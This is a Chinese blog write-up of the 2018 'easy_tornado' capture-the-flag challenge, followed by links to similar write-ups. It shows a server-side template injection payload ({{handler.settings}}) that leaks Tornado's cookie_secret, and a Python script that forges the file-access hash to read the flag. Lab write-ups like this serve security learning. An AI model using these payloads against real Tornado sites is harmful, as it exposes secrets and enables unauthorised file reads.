护网杯 2018 easy_tornado

最新推荐文章于 2024-07-20 17:49:22 发布
最新推荐文章于 2024-07-20 17:49:22 发布
阅读量431 收藏
点赞数
分类专栏: BUUOJ刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BlueDoorZz/article/details/107291183
版权

0x00

题目类型:SSTI注入。

0x01

索引界面下三个文件,flag.txt提示flag在/fllllllllllllag,hint.txt提示hash生成方式为md5(cookie_secret+md5(filename))。

注意到访问文件时为filename+filehash的形式,我们知道了flag的文件名,故只需要构造出flag的hash值,就可以拿到flag了。

http://41855a0a-ea58-4611-a5e2-03840a4b9da6.node3.buuoj.cn/file?filename=/hints.txt&filehash=11bc60156d94c420cbd493f8e2188214

题目名提示为tornado框架,打算构造一个错误的数据看看,能不能看到版本之类的有用信息。随便乱填了一个filehash后,跳转到了一个报错界面。

http://41855a0a-ea58-4611-a5e2-03840a4b9da6.node3.buuoj.cn/error?msg=Error

msg参数中的数据直接回显在了界面上,猜测存在SSTI注入,传入msg={{1}}试试,果然有回显。构造msg={{handler.settings}},发现cookie_secret。

0x02

本地跑出hash值,而后带着hash值访问flag文件。

payload:http://41855a0a-ea58-4611-a5e2-03840a4b9da6.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=18228a78a6afbdd48e1e4982d521ebad

import hashlib

def md5(s):
 md5 = hashlib.md5() 
 s = s.encode('utf-8')
 md5.update(s) 
 return md5.hexdigest()
 
def filehash():
 filename = '/fllllllllllllag'
 cookie_secret = '9b6d419c-e603-4470-b2ad-5b7a9674ec9c'
 print(md5(cookie_secret+md5(filename)))
 
if __name__ == '__main__':
 filehash()

这里我犯了一次傻,用php写了一个脚本跑hash值,提交上去直接报错了,后来想起tornado是python框架。。。。。。

BlueDoorZz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全 | CTF】护网2018easy_tornado解题详析(Tornado之SSTI注入)
等风来
08-24 3939
提示:filename先被md5加密后,结合cookie_secret,再次被md5加密姿势进入页面给出三个链接:提示:filename先被md5加密后,结合cookie_secret,再次被md5加密先加密filename:得到:3bf9f6cf685a6dd8defadabfb41先加密filename:可知存在模板注入,而Tornado框架的附属文件handler.settings中存在cookie_secret故get传参:/error?msg={{handler.settings}}得到
【网络安全 | CTF】攻防世界护网 2018 easy_tornado
等风来
07-23 3722
tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。或一个目录是“/Users/python/tornado-file-read/static_private/”,传入某文件的路径为“/Users/python/tornado-file-read/static/”将得到的cookie_secret同加密的内容一同进行加密。
[护网 2018]easy_tornado
qq_43622442的博客
04-11 4014
[护网 2018]easy_tornado 为了不拖后腿疯狂刷题,hhh 1.打开网站发现三个txt文件: 2.第一个文件提示flag in /fllllllllllllag 3.第二个文件不知道render是啥,百度翻译= =哈哈 4.第三个文件说了文件名的哈希方法: 5.还不能忘记题目的提示,查一下tornado是什么,所以可能是python模板注入了? 6.先直接访问和在参...
[护网 2018]easy_tornado1
最新发布
weixin_63920195的博客
07-20 585
当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty twig,java的jadevelocity。当这些框架对运用渲染函数生成html的时候会出现SSTI的问题。所有handler.settings就指向RequestHandler.application.settings了。SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。
[护网 2018]easy_tornado WriteUp(超级详细!)
lunan的博客
04-22 3509
[护网 2018]easy_tornado   打开题目后,首先发现3个超链接   依次点开三个链接    网址里有参数filename和filehash推测这里flag应该是 filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))里面,filehash里hash就是提示为md5的hash加密。    变量 filename 的值总是为要访问的文件,再根据提示三和 fil
buuojweb刷题wp详解及知识整理—-【护网easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
2018护网逆向题目
10-16
2018护网的3道逆向题目.
2020全国工业互联网安全技术技能大赛-护网-chinaiisc2020.zip
10-24
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
[护网 2018]easy_tornado(SSTI服务器端模板注入)
weixin_45253573的博客
11-12 677
tornado Tornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。 可以考虑服务器端模板注入 参考SSTI完全学习 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty
护网 2018easy_tornado
Lixunzhe0112的博客
01-17 650
常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞。错误的执行了用户输入。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2mako tornado django,php的smarty twig,java的jadevelocity。
BUUCTF WEB [护网 2018]easy_tornado
Y1da的博客
04-17 682
BUUCTF WEB [护网 2018]easy_tornado 进入环境,发现三个文件 /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 根据题目提示可知,题目环境使用python tornado模板渲染搭建,flag文件名为fllllllllllllag。观察URL可知,访问文件需要提交文件名filename和利用cooki
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值